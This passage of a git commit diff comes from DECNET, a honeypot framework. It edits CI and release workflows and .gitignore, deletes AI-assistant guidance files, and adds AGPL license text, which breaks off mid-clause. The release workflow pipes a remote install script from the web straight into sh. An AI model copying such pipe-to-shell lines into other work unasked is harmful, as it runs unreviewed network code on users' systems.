docs: update README to reflect current codebase state

Rewrites the architecture section for the full current module tree and adds new sections for the REST API, swarm/agent mode, service bus, attacker intelligence stack (profiler, clustering, correlation, GeoIP/ASN), MazeNET topology, canary tokens, and TTP tagging/export. Updates the CLI reference table, test count (478 → 5050), and Python version constraints.
chore: relicense to AGPL-3.0-or-later and add SPDX headers
2026-05-26 00:57:40 -04:00 · 2026-05-22 21:04:16 -04:00 · 2026-05-22 18:29:33 -04:00 · 2026-05-22 18:14:50 -04:00 · 2026-05-22 17:50:26 -04:00 · 2026-05-22 16:44:17 -04:00
1900 changed files with 257815 additions and 8811 deletions
--- a/.gitea/workflows/ci.yml
+++ b/.gitea/workflows/ci.yml
@@ -2,7 +2,7 @@ name: CI
 on:
  push:
-    branches: [dev, testing, "temp/merge-*"]
+    branches: [dev, testing]
    paths-ignore:
      - "**/*.md"
      - "docs/**"
@@ -11,28 +11,31 @@ jobs:
  lint:
    name: Lint (ruff)
    runs-on: ubuntu-latest
    if: github.ref == 'refs/heads/dev'
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: "3.11"
      - run: pip install ruff
-      - run: ruff check .
+      - run: ruff check decnet/
  bandit:
    name: SAST (bandit)
    runs-on: ubuntu-latest
    if: github.ref == 'refs/heads/dev'
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: "3.11"
      - run: pip install bandit
-      - run: bandit -r decnet/ -ll -x decnet/services/registry.py
+      - run: bandit -r decnet/ -ll -x decnet/services/registry.py -x decnet/templates/
  pip-audit:
    name: Dependency audit (pip-audit)
    runs-on: ubuntu-latest
    if: github.ref == 'refs/heads/dev'
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
@@ -40,57 +43,12 @@ jobs:
          python-version: "3.11"
      - run: pip install pip-audit
      - run: pip install -e .[dev]
-      - run: pip-audit --skip-editable
+      - run: pip-audit --skip-editable --ignore-vuln CVE-2025-65896 --ignore-vuln CVE-2026-3219
  test-standard:
    name: Test (Standard)
    runs-on: ubuntu-latest
    needs: [lint, bandit, pip-audit]
    strategy:
      matrix:
        python-version: ["3.11", "3.12"]
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: ${{ matrix.python-version }}
      - run: pip install -e .[dev]
      - run: pytest
  test-live:
    name: Test (Live)
    runs-on: ubuntu-latest
    needs: [test-standard]
    strategy:
      matrix:
        python-version: ["3.11"]
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: ${{ matrix.python-version }}
      - run: pip install -e .[dev]
      - run: pytest -m live
  test-fuzz:
    name: Test (Fuzz)
    runs-on: ubuntu-latest
    needs: [test-live]
    strategy:
      matrix:
        python-version: ["3.11"]
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: ${{ matrix.python-version }}
      - run: pip install -e .[dev]
      - run: pytest -m fuzz
  merge-to-testing:
    name: Merge dev → testing
    runs-on: ubuntu-latest
-    needs: [test-standard, test-live, test-fuzz]
+    needs: [lint, bandit, pip-audit]
    if: github.ref == 'refs/heads/dev'
    steps:
      - uses: actions/checkout@v4
@@ -105,13 +63,63 @@ jobs:
        run: |
          git fetch origin testing
          git checkout testing
-          git merge origin/dev --no-ff -m "ci: auto-merge dev → testing [skip ci]"
+          git merge origin/dev --no-ff -m "ci: auto-merge dev → testing"
          git push origin testing
-  prepare-merge-to-main:
+  test-standard:
-    name: Prepare Merge to Main
+    name: Test (Standard)
    runs-on: ubuntu-latest
-    needs: [test-standard, test-live, test-fuzz]
+    if: github.ref == 'refs/heads/testing'
    strategy:
      matrix:
        python-version: ["3.11"]
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: ${{ matrix.python-version }}
      - run: pip install -e .[dev]
      - run: pytest
  test-live:
    name: Test (Live)
    runs-on: ubuntu-latest
    if: github.ref == 'refs/heads/testing'
    needs: [test-standard]
    services:
      mysql:
        image: mysql:8.0
        env:
          MYSQL_ROOT_PASSWORD: root
          MYSQL_DATABASE: decnet_test
        ports:
          - 3307:3306
        options: >-
          --health-cmd="mysqladmin ping -h 127.0.0.1"
          --health-interval=10s
          --health-timeout=5s
          --health-retries=5
    strategy:
      matrix:
        python-version: ["3.11"]
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: ${{ matrix.python-version }}
      - run: pip install -e .[dev]
      - run: pytest -m live
        env:
          DECNET_MYSQL_HOST: 127.0.0.1
          DECNET_MYSQL_PORT: 3307
          DECNET_MYSQL_USER: root
          DECNET_MYSQL_PASSWORD: root
          DECNET_MYSQL_DATABASE: decnet_test
  merge-to-main:
    name: Merge testing → main
    runs-on: ubuntu-latest
    needs: [test-standard, test-live]
    if: github.ref == 'refs/heads/testing'
    steps:
      - uses: actions/checkout@v4
@@ -122,33 +130,12 @@ jobs:
        run: |
          git config user.name "DECNET CI"
          git config user.email "ci@decnet.local"
-      - name: Create temp branch and sync with main
+      - name: Merge testing into main
        run: |
          git fetch origin main
          git checkout -b temp/merge-testing-to-main
          echo "--- Switched to temp branch, merging main into it ---"
          git merge origin/main --no-edit || { echo "CONFLICT: Manual resolution required"; exit 1; }
          git push origin temp/merge-testing-to-main --force
  finalize-merge-to-main:
    name: Finalize Merge to Main
    runs-on: ubuntu-latest
    needs: [test-standard, test-live, test-fuzz]
    if: startsWith(github.ref, 'refs/heads/temp/merge-')
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
          token: ${{ secrets.DECNET_PR_TOKEN }}
      - name: Configure git
        run: |
          git config user.name "DECNET CI"
          git config user.email "ci@decnet.local"
      - name: Merge RC into main
        run: |
          git fetch origin main
          git checkout main
-          git merge ${{ github.ref }} --no-ff -m "ci: auto-merge testing → main"
+          git merge origin/testing --no-ff -m "ci: auto-merge testing → main" || {
            echo "CONFLICT: testing and main have diverged — manual resolution required"
            exit 1
          }
          git push origin main
          echo "--- Cleaning up temp branch ---"
          git push origin --delete ${{ github.ref_name }}
--- a/.gitea/workflows/release.yml
+++ b/.gitea/workflows/release.yml
@@ -33,13 +33,13 @@ jobs:
        id: version
        run: |
          # Calculate next version (v0.x)
-          LATEST_TAG=$(git describe --tags --abbrev=0 2>/dev/null || echo "v0.0")
+          LATEST_TAG=$(git describe --tags --abbrev=0 2>/dev/null || echo "v0.0.0")
          NEXT_VER=$(python3 -c "
          tag = '$LATEST_TAG'.lstrip('v')
          parts = tag.split('.')
          major = int(parts[0]) if parts[0] else 0
          minor = int(parts[1]) if len(parts) > 1 else 0
-          print(f'{major}.{minor + 1}')
+          print(f'{major}.{minor + 1}.0')
          ")
          echo "Next version: $NEXT_VER (calculated from $LATEST_TAG)"
@@ -49,7 +49,11 @@ jobs:
          git add pyproject.toml
          git commit -m "chore: auto-release v$NEXT_VER [skip ci]" || echo "No changes to commit"
-          git tag -a "v$NEXT_VER" -m "Auto-release v$NEXT_VER"
+          CHANGELOG=$(git log ${LATEST_TAG}..HEAD --oneline --no-decorate --no-merges)
          git tag -a "v$NEXT_VER" -m "Auto-release v$NEXT_VER
 Changes since $LATEST_TAG:
 $CHANGELOG"
          git push origin main --follow-tags
          echo "version=$NEXT_VER" >> $GITHUB_OUTPUT
@@ -111,13 +115,13 @@ jobs:
          cache-from: type=gha
          cache-to: type=gha,mode=max
      - name: Install Trivy
        run: |
          curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh -s -- -b /usr/local/bin
      - name: Scan with Trivy
-        uses: aquasecurity/trivy-action@master
+        run: |
-        with:
+          trivy image --exit-code 1 --severity CRITICAL --ignore-unfixed decnet-${{ matrix.service }}:scan
          image-ref: decnet-${{ matrix.service }}:scan
          exit-code: "1"
          severity: CRITICAL
          ignore-unfixed: true
      - name: Push image
        if: success()
--- a/.gitignore
+++ b/.gitignore
@@ -1,6 +1,11 @@
 .venv/
 .venv*/
 docker-compose.yaml
 .311/
 .3[0-9][0-9]/
 logs/
-.claude/
+.claude/*
 CLAUDE.md
 __pycache__/
 *.pyc
 *.pyo
@@ -8,9 +13,12 @@ __pycache__/
 dist/
 build/
 decnet-compose.yml
 # Per-topology compose fragments emitted by `decnet topology deploy`.
 decnet-topology-*-compose.yml
 # Docker build context cache.
 .docker/
 decnet-state.json
 *.ini
 .env
 decnet.log*
 *.loggy
 *.nmap
@@ -18,8 +26,48 @@ linterfails.log
 webmail
 windows1
 *.db
 *.db-shm
 *.db-wal
 decnet.*.log
 # Rotated copies (logrotate appends .1, .2, .gz...) — the existing
 # decnet.*.log glob doesn't catch the suffix.
 decnet.*.log.*
 decnet.json
-.env
+.env*
 .env.local
 .coverage
 .hypothesis/
 profiles/*
 tests/test_decnet.db*
 # Nested git clone of the wiki — not a submodule, just a local
 # working copy so we can edit docs without a full round-trip.
 wiki-checkout/
 # Scratch test/debug outputs that leak from saved `pytest > hang.log`
 # or `pytest > schem` redirections.
 hang.log
 schem
 *.pytest.log
 # pydeps-style dependency graph dumps from local analysis runs.
 deps.txt
 # Node modules vendored under decnet/canary/ for the obfuscator helper.
 # The package.json is the source of truth; modules are reinstalled at
 # build/deploy time.
 node_modules/
 package-lock.json
 # TTP rule-precision corpus pulled from prod sqlite. Real attacker
 # payloads — operator-only artifact. The synthetic ``seed_*.jsonl``
 # files alongside ARE committed and exercise the harness in CI.
 tests/ttp/rule_precision/corpus/*.jsonl
 tests/ttp/rule_precision/corpus/seed_*.jsonl
 threatfox-api.json
 # MITRE ATT&CK STIX bundle — 50 MB, fetched at runtime via attack_stix.py
 enterprise-attack-*.json
 # pytest failure dump files
 testfail
--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -1,58 +0,0 @@
 # CLAUDE.md
 This file provides guidance to Claude Code (claude.ai/code) when working with code in this repository.
 ## Commands
 ```bash
 # Install (dev)
 pip install -e .
 # List registered service plugins
 decnet services
 # Dry-run (generates compose, no containers)
 decnet deploy --mode unihost --deckies 3 --randomize-services --dry-run
 # Full deploy (requires root for MACVLAN)
 sudo decnet deploy --mode unihost --deckies 5 --interface eth0 --randomize-services
 sudo decnet deploy --mode unihost --deckies 3 --services ssh,smb --log-target 192.168.1.5:5140
 # Status / teardown
 decnet status
 sudo decnet teardown --all
 sudo decnet teardown --id decky-01
 ```
 ## Project Overview
 DECNET is a honeypot/deception network framework. It deploys fake machines (called **deckies**) with realistic services (RDP, SMB, SSH, FTP, etc.) to lure and profile attackers. All attacker interactions are aggregated to an isolated logging network (ELK stack / SIEM).
 ## Deployment Models
 **UNIHOST** — one real host spins up _n_ deckies via a container orchestrator. Simpler, single-machine deployment.
 **SWARM (MULTIHOST)** — _n_ real hosts each running deckies. Orchestrated via Ansible/sshpass or similar tooling.
 ## Core Technology Choices
 - **Containers**: Docker Compose is the starting point but other orchestration frameworks should be evaluated if they serve the project better. `debian:bookworm-slim` is the default base image; mixing in Ubuntu, CentOS, or other distros is encouraged to make the decoy network look heterogeneous.
 - **Networking**: Deckies need to appear as real machines on the LAN (own MACs/IPs). MACVLAN and IPVLAN are candidates; the right driver depends on the host environment. WSL has known limitations — bare metal or a VM is preferred for testing.
 - **Log pipeline**: Logstash → ELK stack → SIEM (isolated network, not reachable from decoy network)
 ## Architecture Constraints
 - The decoy network must be reachable from the outside (attacker-facing).
 - The logging/aggregation network must be isolated from the decoy network.
 - A publicly accessible real server acts as the bridge between the two networks.
 - Deckies should differ in exposed services and OS fingerprints to appear as a heterogeneous network.
 - **IMPORTANT**: The system now strictly enforces dependency injection for storage. Do not import `SQLiteRepository` directly in new features; instead, use `get_repository()` from the factory or the FastAPI `get_repo` dependency.
 ## Development and testing
 - For every new feature, pytests must me made.
 - Pytest is the main testing framework in use.
 - NEVER pass broken code to the user.
    - Broken means: not running, not passing 100% tests, etc.
 - After tests pass with 100%, always git commit your changes.
 - NEVER add "Co-Authored-By" or any Claude attribution lines to git commit messages.
--- a/17
+++ b/17
@@ -0,0 +1,17 @@
 DECNET - Deception Network
 Copyright (C) 2026 Samuel Paschuan <samsam70000@gmail.com>
 This program is free software: you can redistribute it and/or modify
 it under the terms of the GNU Affero General Public License as
 published by the Free Software Foundation, either version 3 of the
 License, or (at your option) any later version.
 This program is distributed in the hope that it will be useful, but
 WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 Affero General Public License for more details.
 You should have received a copy of the GNU Affero General Public
 License along with this program. If not, see <https://www.gnu.org/licenses/>.
 SPDX-License-Identifier: AGPL-3.0-or-later
--- a/GEMINI.md
+++ b/GEMINI.md
@@ -1,104 +0,0 @@
 # DECNET (Deception Network) Project Context
 DECNET is a high-fidelity honeypot framework designed to deploy heterogeneous fleets of fake machines (called **deckies**) that appear as real hosts on a local network.
 ## Project Overview
 - **Core Purpose:** To lure, profile, and log attacker interactions within a controlled, deceptive environment.
 - **Key Technology:** Linux-native container networking (MACVLAN/IPvlan) combined with Docker to give each decoy its own MAC address, IP, and realistic TCP/IP stack behavior.
 - **Main Components:**
  - **Deckies:** Group of containers sharing a network namespace (one base container + multiple service containers).
  - **Archetypes:** Pre-defined machine profiles (e.g., `windows-workstation`, `linux-server`) that bundle services and OS fingerprints.
  - **Services:** Modular honeypot plugins (SSH, SMB, RDP, etc.) built as `BaseService` subclasses.
  - **OS Fingerprinting:** Sysctl-based TCP/IP stack tuning to spoof OS detection (nmap).
  - **Logging Pipeline:** RFC 5424 syslog forwarding to an isolated SIEM/ELK stack.
 ## Technical Stack
 - **Language:** Python 3.11+
 - **CLI Framework:** [Typer](https://typer.tiangolo.com/)
 - **Data Validation:** [Pydantic v2](https://docs.pydantic.dev/)
 - **Orchestration:** Docker Engine 24+ (via Docker SDK for Python)
 - **Networking:** MACVLAN (default) or IPvlan L2 (for WiFi/restricted environments).
 - **Testing:** Pytest (100% pass requirement).
 - **Formatting/Linting:** Ruff, Bandit (SAST), pip-audit.
 ## Architecture
 ```text
 Host NIC (eth0)
  └── MACVLAN Bridge
        ├── Decky-01 (192.168.1.10) -> [Base] + [SSH] + [HTTP]
        ├── Decky-02 (192.168.1.11) -> [Base] + [SMB] + [RDP]
        └── ...
 ```
 - **Base Container:** Owns the IP/MAC, sets `sysctls` for OS spoofing, and runs `sleep infinity`.
 - **Service Containers:** Use `network_mode: service:<base>` to share the identity and networking of the base container.
 - **Isolation:** Decoy traffic is strictly separated from the logging network.
 ## Key Commands
 ### Development & Maintenance
 - **Install (Dev):** 
    - `rm .venv -rf`
    - `python3 -m venv .venv`
    - `source .venv/bin/activate`
    - `pip install -e .`
 - **Run Tests:** `pytest` (Run before any commit)
 - **Linting:** `ruff check .`
 - **Security Scan:** `bandit -r decnet/`
 - **Web Git:** git.resacachile.cl (Gitea)
 ### CLI Usage
 - **List Services:** `decnet services`
 - **List Archetypes:** `decnet archetypes`
 - **Dry Run (Compose Gen):** `decnet deploy --deckies 3 --randomize-services --dry-run`
 - **Deploy (Full):** `sudo .venv/bin/decnet deploy --interface eth0 --deckies 5 --randomize-services`
 - **Status:** `decnet status`
 - **Teardown:** `sudo .venv/bin/decnet teardown --all`
 ## Development Conventions
 - **Code Style:** 
  - Strict adherence to Ruff/PEP8.
  - **Always use typed variables**. If any non-types variables are found, they must be corrected.
    - The correct way is `x: int = 1`, never `x : int = 1`.
    - If assignment is present, always use a space between the type and the equal sign `x: int = 1`.
  - **Never** use lowercase L (l), uppercase o (O) or uppercase i (i) in single-character names.
  - **Internal vars are to be declared with an underscore** (_internal_variable_name).
  - **Internal to internal vars are to be declared with double underscore** (__internal_variable_name).
  - Always use snake_case for code.
  - Always use PascalCase for classes and generics.
 - **Testing:** New features MUST include a `pytest` case. 100% test pass rate is mandatory before merging.
 - **Plugin System:**
  - New services go in `decnet/services/<name>.py`.
  - Subclass `decnet.services.base.BaseService`.
  - The registry uses auto-discovery; no manual registration required.
 - **Configuration:**
  - Use Pydantic models in `decnet/config.py` for any new settings.
  - INI file parsing is handled in `decnet/ini_loader.py`.
 - **State Management:**
  - Runtime state is persisted in `decnet-state.json`.
  - Do not modify this file manually.
 - **General Development Guidelines**:
  - **Never** commit broken code, or before running `pytest`s or `bandit` at the project level.
  - **No matter how small** the changes, they must be committed.
  - **If new features are addedd** new tests must be added, too.
  - **Never present broken code to the user**. Test, validate, then present.
  - **Extensive testing** for every function must be created.
  - **Always develop in the `dev` branch, never in `main`.**
  - **Test in the `testing` branch.**
  - **IMPORTANT**: The system now strictly enforces dependency injection for storage. Do not import `SQLiteRepository` directly in new features; instead, use `get_repository()` from the factory or the FastAPI `get_repo` dependency.
 ## Directory Structure
 - `decnet/`: Main source code.
  - `services/`: Honeypot service implementations.
  - `logging/`: Syslog formatting and forwarding logic.
  - `correlation/`: (In Progress) Logic for grouping attacker events.
 - `templates/`: Dockerfiles and entrypoint scripts for services.
 - `tests/`: Pytest suite.
 - `pyproject.toml`: Dependency and entry point definitions.
 - `CLAUDE.md`: Claude-specific environment guidance.
 - `DEVELOPMENT.md`: Roadmap and TODOs.
--- a/661
+++ b/661
@@ -0,0 +1,661 @@
                    GNU AFFERO GENERAL PUBLIC LICENSE
                       Version 3, 19 November 2007
 Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
 Everyone is permitted to copy and distribute verbatim copies
 of this license document, but changing it is not allowed.
                            Preamble
  The GNU Affero General Public License is a free, copyleft license for
 software and other kinds of works, specifically designed to ensure
 cooperation with the community in the case of network server software.
  The licenses for most software and other practical works are designed
 to take away your freedom to share and change the works.  By contrast,
 our General Public Licenses are intended to guarantee your freedom to
 share and change all versions of a program--to make sure it remains free
 software for all its users.
  When we speak of free software, we are referring to freedom, not
 price.  Our General Public Licenses are designed to make sure that you
 have the freedom to distribute copies of free software (and charge for
 them if you wish), that you receive source code or can get it if you
 want it, that you can change the software or use pieces of it in new
 free programs, and that you know you can do these things.
  Developers that use our General Public Licenses protect your rights
 with two steps: (1) assert copyright on the software, and (2) offer
 you this License which gives you legal permission to copy, distribute
 and/or modify the software.
  A secondary benefit of defending all users' freedom is that
 improvements made in alternate versions of the program, if they
 receive widespread use, become available for other developers to
 incorporate.  Many developers of free software are heartened and
 encouraged by the resulting cooperation.  However, in the case of
 software used on network servers, this result may fail to come about.
 The GNU General Public License permits making a modified version and
 letting the public access it on a server without ever releasing its
 source code to the public.
  The GNU Affero General Public License is designed specifically to
 ensure that, in such cases, the modified source code becomes available
 to the community.  It requires the operator of a network server to
 provide the source code of the modified version running there to the
 users of that server.  Therefore, public use of a modified version, on
 a publicly accessible server, gives the public access to the source
 code of the modified version.
  An older license, called the Affero General Public License and
 published by Affero, was designed to accomplish similar goals.  This is
 a different license, not a version of the Affero GPL, but Affero has
 released a new version of the Affero GPL which permits relicensing under
 this license.
  The precise terms and conditions for copying, distribution and
 modification follow.
                       TERMS AND CONDITIONS
  0. Definitions.
  "This License" refers to version 3 of the GNU Affero General Public License.
  "Copyright" also means copyright-like laws that apply to other kinds of
 works, such as semiconductor masks.
  "The Program" refers to any copyrightable work licensed under this
 License.  Each licensee is addressed as "you".  "Licensees" and
 "recipients" may be individuals or organizations.
  To "modify" a work means to copy from or adapt all or part of the work
 in a fashion requiring copyright permission, other than the making of an
 exact copy.  The resulting work is called a "modified version" of the
 earlier work or a work "based on" the earlier work.
  A "covered work" means either the unmodified Program or a work based
 on the Program.
  To "propagate" a work means to do anything with it that, without
 permission, would make you directly or secondarily liable for
 infringement under applicable copyright law, except executing it on a
 computer or modifying a private copy.  Propagation includes copying,
 distribution (with or without modification), making available to the
 public, and in some countries other activities as well.
  To "convey" a work means any kind of propagation that enables other
 parties to make or receive copies.  Mere interaction with a user through
 a computer network, with no transfer of a copy, is not conveying.
  An interactive user interface displays "Appropriate Legal Notices"
 to the extent that it includes a convenient and prominently visible
 feature that (1) displays an appropriate copyright notice, and (2)
 tells the user that there is no warranty for the work (except to the
 extent that warranties are provided), that licensees may convey the
 work under this License, and how to view a copy of this License.  If
 the interface presents a list of user commands or options, such as a
 menu, a prominent item in the list meets this criterion.
  1. Source Code.
  The "source code" for a work means the preferred form of the work
 for making modifications to it.  "Object code" means any non-source
 form of a work.
  A "Standard Interface" means an interface that either is an official
 standard defined by a recognized standards body, or, in the case of
 interfaces specified for a particular programming language, one that
 is widely used among developers working in that language.
  The "System Libraries" of an executable work include anything, other
 than the work as a whole, that (a) is included in the normal form of
 packaging a Major Component, but which is not part of that Major
 Component, and (b) serves only to enable use of the work with that
 Major Component, or to implement a Standard Interface for which an
 implementation is available to the public in source code form.  A
 "Major Component", in this context, means a major essential component
 (kernel, window system, and so on) of the specific operating system
 (if any) on which the executable work runs, or a compiler used to
 produce the work, or an object code interpreter used to run it.
  The "Corresponding Source" for a work in object code form means all
 the source code needed to generate, install, and (for an executable
 work) run the object code and to modify the work, including scripts to
 control those activities.  However, it does not include the work's
 System Libraries, or general-purpose tools or generally available free
 programs which are used unmodified in performing those activities but
 which are not part of the work.  For example, Corresponding Source
 includes interface definition files associated with source files for
 the work, and the source code for shared libraries and dynamically
 linked subprograms that the work is specifically designed to require,
 such as by intimate data communication or control flow between those
 subprograms and other parts of the work.
  The Corresponding Source need not include anything that users
 can regenerate automatically from other parts of the Corresponding
 Source.
  The Corresponding Source for a work in source code form is that
 same work.
  2. Basic Permissions.
  All rights granted under this License are granted for the term of
 copyright on the Program, and are irrevocable provided the stated
 conditions are met.  This License explicitly affirms your unlimited
 permission to run the unmodified Program.  The output from running a
 covered work is covered by this License only if the output, given its
 content, constitutes a covered work.  This License acknowledges your
 rights of fair use or other equivalent, as provided by copyright law.
  You may make, run and propagate covered works that you do not
 convey, without conditions so long as your license otherwise remains
 in force.  You may convey covered works to others for the sole purpose
 of having them make modifications exclusively for you, or provide you
 with facilities for running those works, provided that you comply with
 the terms of this License in conveying all material for which you do
 not control copyright.  Those thus making or running the covered works
 for you must do so exclusively on your behalf, under your direction
 and control, on terms that prohibit them from making any copies of
 your copyrighted material outside their relationship with you.
  Conveying under any other circumstances is permitted solely under
 the conditions stated below.  Sublicensing is not allowed; section 10
 makes it unnecessary.
  3. Protecting Users' Legal Rights From Anti-Circumvention Law.
  No covered work shall be deemed part of an effective technological
 measure under any applicable law fulfilling obligations under article
 11 of the WIPO copyright treaty adopted on 20 December 1996, or
 similar laws prohibiting or restricting circumvention of such
 measures.
  When you convey a covered work, you waive any legal power to forbid
 circumvention of technological measures to the extent such circumvention
 is effected by exercising rights under this License with respect to
 the covered work, and you disclaim any intention to limit operation or
 modification of the work as a means of enforcing, against the work's
 users, your or third parties' legal rights to forbid circumvention of
 technological measures.
  4. Conveying Verbatim Copies.
  You may convey verbatim copies of the Program's source code as you
 receive it, in any medium, provided that you conspicuously and
 appropriately publish on each copy an appropriate copyright notice;
 keep intact all notices stating that this License and any
 non-permissive terms added in accord with section 7 apply to the code;
 keep intact all notices of the absence of any warranty; and give all
 recipients a copy of this License along with the Program.
  You may charge any price or no price for each copy that you convey,
 and you may offer support or warranty protection for a fee.
  5. Conveying Modified Source Versions.
  You may convey a work based on the Program, or the modifications to
 produce it from the Program, in the form of source code under the
 terms of section 4, provided that you also meet all of these conditions:
    a) The work must carry prominent notices stating that you modified
    it, and giving a relevant date.
    b) The work must carry prominent notices stating that it is
    released under this License and any conditions added under section
    7.  This requirement modifies the requirement in section 4 to
    "keep intact all notices".
    c) You must license the entire work, as a whole, under this
    License to anyone who comes into possession of a copy.  This
    License will therefore apply, along with any applicable section 7
    additional terms, to the whole of the work, and all its parts,
    regardless of how they are packaged.  This License gives no
    permission to license the work in any other way, but it does not
    invalidate such permission if you have separately received it.
    d) If the work has interactive user interfaces, each must display
    Appropriate Legal Notices; however, if the Program has interactive
    interfaces that do not display Appropriate Legal Notices, your
    work need not make them do so.
  A compilation of a covered work with other separate and independent
 works, which are not by their nature extensions of the covered work,
 and which are not combined with it such as to form a larger program,
 in or on a volume of a storage or distribution medium, is called an
 "aggregate" if the compilation and its resulting copyright are not
 used to limit the access or legal rights of the compilation's users
 beyond what the individual works permit.  Inclusion of a covered work
 in an aggregate does not cause this License to apply to the other
 parts of the aggregate.
  6. Conveying Non-Source Forms.
  You may convey a covered work in object code form under the terms
 of sections 4 and 5, provided that you also convey the
 machine-readable Corresponding Source under the terms of this License,
 in one of these ways:
    a) Convey the object code in, or embodied in, a physical product
    (including a physical distribution medium), accompanied by the
    Corresponding Source fixed on a durable physical medium
    customarily used for software interchange.
    b) Convey the object code in, or embodied in, a physical product
    (including a physical distribution medium), accompanied by a
    written offer, valid for at least three years and valid for as
    long as you offer spare parts or customer support for that product
    model, to give anyone who possesses the object code either (1) a
    copy of the Corresponding Source for all the software in the
    product that is covered by this License, on a durable physical
    medium customarily used for software interchange, for a price no
    more than your reasonable cost of physically performing this
    conveying of source, or (2) access to copy the
    Corresponding Source from a network server at no charge.
    c) Convey individual copies of the object code with a copy of the
    written offer to provide the Corresponding Source.  This
    alternative is allowed only occasionally and noncommercially, and
    only if you received the object code with such an offer, in accord
    with subsection 6b.
    d) Convey the object code by offering access from a designated
    place (gratis or for a charge), and offer equivalent access to the
    Corresponding Source in the same way through the same place at no
    further charge.  You need not require recipients to copy the
    Corresponding Source along with the object code.  If the place to
    copy the object code is a network server, the Corresponding Source
    may be on a different server (operated by you or a third party)
    that supports equivalent copying facilities, provided you maintain
    clear directions next to the object code saying where to find the
    Corresponding Source.  Regardless of what server hosts the
    Corresponding Source, you remain obligated to ensure that it is
    available for as long as needed to satisfy these requirements.
    e) Convey the object code using peer-to-peer transmission, provided
    you inform other peers where the object code and Corresponding
    Source of the work are being offered to the general public at no
    charge under subsection 6d.
  A separable portion of the object code, whose source code is excluded
 from the Corresponding Source as a System Library, need not be
 included in conveying the object code work.
  A "User Product" is either (1) a "consumer product", which means any
 tangible personal property which is normally used for personal, family,
 or household purposes, or (2) anything designed or sold for incorporation
 into a dwelling.  In determining whether a product is a consumer product,
 doubtful cases shall be resolved in favor of coverage.  For a particular
 product received by a particular user, "normally used" refers to a
 typical or common use of that class of product, regardless of the status
 of the particular user or of the way in which the particular user
 actually uses, or expects or is expected to use, the product.  A product
 is a consumer product regardless of whether the product has substantial
 commercial, industrial or non-consumer uses, unless such uses represent
 the only significant mode of use of the product.
  "Installation Information" for a User Product means any methods,
 procedures, authorization keys, or other information required to install
 and execute modified versions of a covered work in that User Product from
 a modified version of its Corresponding Source.  The information must
 suffice to ensure that the continued functioning of the modified object
 code is in no case prevented or interfered with solely because
 modification has been made.
  If you convey an object code work under this section in, or with, or
 specifically for use in, a User Product, and the conveying occurs as
 part of a transaction in which the right of possession and use of the
 User Product is transferred to the recipient in perpetuity or for a
 fixed term (regardless of how the transaction is characterized), the
 Corresponding Source conveyed under this section must be accompanied
 by the Installation Information.  But this requirement does not apply
 if neither you nor any third party retains the ability to install
 modified object code on the User Product (for example, the work has
 been installed in ROM).
  The requirement to provide Installation Information does not include a
 requirement to continue to provide support service, warranty, or updates
 for a work that has been modified or installed by the recipient, or for
 the User Product in which it has been modified or installed.  Access to a
 network may be denied when the modification itself materially and
 adversely affects the operation of the network or violates the rules and
 protocols for communication across the network.
  Corresponding Source conveyed, and Installation Information provided,
 in accord with this section must be in a format that is publicly
 documented (and with an implementation available to the public in
 source code form), and must require no special password or key for
 unpacking, reading or copying.
  7. Additional Terms.
  "Additional permissions" are terms that supplement the terms of this
 License by making exceptions from one or more of its conditions.
 Additional permissions that are applicable to the entire Program shall
 be treated as though they were included in this License, to the extent
 that they are valid under applicable law.  If additional permissions
 apply only to part of the Program, that part may be used separately
 under those permissions, but the entire Program remains governed by
 this License without regard to the additional permissions.
  When you convey a copy of a covered work, you may at your option
 remove any additional permissions from that copy, or from any part of
 it.  (Additional permissions may be written to require their own
 removal in certain cases when you modify the work.)  You may place
 additional permissions on material, added by you to a covered work,
 for which you have or can give appropriate copyright permission.
  Notwithstanding any other provision of this License, for material you
 add to a covered work, you may (if authorized by the copyright holders of
 that material) supplement the terms of this License with terms:
    a) Disclaiming warranty or limiting liability differently from the
    terms of sections 15 and 16 of this License; or
    b) Requiring preservation of specified reasonable legal notices or
    author attributions in that material or in the Appropriate Legal
    Notices displayed by works containing it; or
    c) Prohibiting misrepresentation of the origin of that material, or
    requiring that modified versions of such material be marked in
    reasonable ways as different from the original version; or
    d) Limiting the use for publicity purposes of names of licensors or
    authors of the material; or
    e) Declining to grant rights under trademark law for use of some
    trade names, trademarks, or service marks; or
    f) Requiring indemnification of licensors and authors of that
    material by anyone who conveys the material (or modified versions of
    it) with contractual assumptions of liability to the recipient, for
    any liability that these contractual assumptions directly impose on
    those licensors and authors.
  All other non-permissive additional terms are considered "further
 restrictions" within the meaning of section 10.  If the Program as you
 received it, or any part of it, contains a notice stating that it is
 governed by this License along with a term that is a further
 restriction, you may remove that term.  If a license document contains
 a further restriction but permits relicensing or conveying under this
 License, you may add to a covered work material governed by the terms
 of that license document, provided that the further restriction does
 not survive such relicensing or conveying.
  If you add terms to a covered work in accord with this section, you
 must place, in the relevant source files, a statement of the
 additional terms that apply to those files, or a notice indicating
 where to find the applicable terms.
  Additional terms, permissive or non-permissive, may be stated in the
 form of a separately written license, or stated as exceptions;
 the above requirements apply either way.
  8. Termination.
  You may not propagate or modify a covered work except as expressly
 provided under this License.  Any attempt otherwise to propagate or
 modify it is void, and will automatically terminate your rights under
 this License (including any patent licenses granted under the third
 paragraph of section 11).
  However, if you cease all violation of this License, then your
 license from a particular copyright holder is reinstated (a)
 provisionally, unless and until the copyright holder explicitly and
 finally terminates your license, and (b) permanently, if the copyright
 holder fails to notify you of the violation by some reasonable means
 prior to 60 days after the cessation.
  Moreover, your license from a particular copyright holder is
 reinstated permanently if the copyright holder notifies you of the
